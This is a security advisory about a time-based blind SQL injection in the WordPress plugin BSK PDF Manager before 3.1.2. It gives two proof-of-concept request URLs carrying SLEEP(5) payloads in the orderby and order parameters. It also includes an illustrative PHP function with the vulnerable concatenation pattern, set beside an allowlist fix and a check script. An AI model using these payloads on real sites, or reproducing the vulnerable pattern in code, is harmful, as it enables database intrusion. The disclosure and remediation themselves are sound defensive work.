The plugin does not validate or escape the orderby and order request parameters before concatenating them into a SQL statement, leading to a SQL injection issue (exploitable as a time-based blind injection, as the proof of concept below shows).
With at least one BSK PDF Category, either of the following requests delays the response by about 5 seconds:

https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&order=and+sleep(5)

https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&orderby=last_date`+AND+SLEEP(5)+OR+`last_date
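The two payloads above work because an ORDER BY clause cannot be parameterised with $wpdb->prepare(): the column name and sort direction end up in the query as raw identifiers, so the only safe approach is to map both parameters onto a fixed allowlist before they reach SQL. The following is an added illustration of that vulnerable pattern next to an allowlisted fix; it is not the plugin's own code, and the function names, table name and column names (id, name, last_date) are assumptions.

```php
<?php
// Added example, not code from the BSK PDF Manager plugin. Table and column
// names, and the bsk_example_* function names, are assumed for illustration.

// Vulnerable pattern: sort parameters from the request are concatenated into the
// query. Escaping with esc_sql() would not help either, because the values are
// identifiers, not string literals; "and sleep(5)" in either parameter becomes
// part of the ORDER BY expression and is evaluated per row.
function bsk_example_list_categories_vulnerable( wpdb $wpdb ) {
    $orderby = isset( $_GET['orderby'] ) ? wp_unslash( $_GET['orderby'] ) : 'id';
    $order   = isset( $_GET['order'] )   ? wp_unslash( $_GET['order'] )   : 'ASC';
    $sql = "SELECT * FROM {$wpdb->prefix}bsk_pdf_categories ORDER BY {$orderby} {$order}";
    return $wpdb->get_results( $sql );
}

// Hardened pattern: anything not on the allowlist falls back to a safe default,
// so the attacker-controlled string never reaches the query text.
function bsk_example_sort_clause( $orderby, $order ) {
    $allowed_columns = array( 'id', 'name', 'last_date' ); // assumed column names
    $orderby = is_string( $orderby ) ? strtolower( trim( $orderby ) ) : '';
    $order   = is_string( $order )   ? strtoupper( trim( $order ) )   : '';
    if ( ! in_array( $orderby, $allowed_columns, true ) ) {
        $orderby = 'id';
    }
    if ( 'DESC' !== $order ) {
        $order = 'ASC';
    }
    // Back-quote the (now trusted) column name so a future allowlist entry that
    // collides with a reserved word still works.
    return "ORDER BY `{$orderby}` {$order}";
}

function bsk_example_list_categories_hardened( wpdb $wpdb ) {
    $orderby = isset( $_GET['orderby'] ) ? wp_unslash( $_GET['orderby'] ) : 'id';
    $order   = isset( $_GET['order'] )   ? wp_unslash( $_GET['order'] )   : 'ASC';
    $sql = "SELECT * FROM {$wpdb->prefix}bsk_pdf_categories "
         . bsk_example_sort_clause( $orderby, $order );
    return $wpdb->get_results( $sql );
}

// Stand-alone check of the allowlist against the advisory's two payloads and one
// legitimate request; runs from the CLI without WordPress loaded.
if ( PHP_SAPI === 'cli' && realpath( $argv[0] ) === __FILE__ ) {
    $cases = array(
        array( 'last_date', 'and sleep(5)' ),                    // order payload
        array( 'last_date` AND SLEEP(5) OR `last_date', 'ASC' ), // orderby payload
        array( 'name', 'desc' ),                                 // legitimate request
    );
    foreach ( $cases as $c ) {
        echo bsk_example_sort_clause( $c[0], $c[1] ), PHP_EOL;
    }
}
```

Run with `php example.php`: the first payload is reduced to ORDER BY `last_date` ASC (the tampered direction is discarded), the second to ORDER BY `id` ASC (the tampered column is discarded), and the legitimate request becomes ORDER BY `name` DESC. WordPress also ships sanitize_sql_orderby(), which rejects both payloads, but an explicit allowlist of the columns the screen actually sorts by is stricter and does not depend on a regular expression.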
| CPE | Name | Operator | Version |
|---|---|---|---|
| | bsk-pdf-manager | lt | 3.1.2 |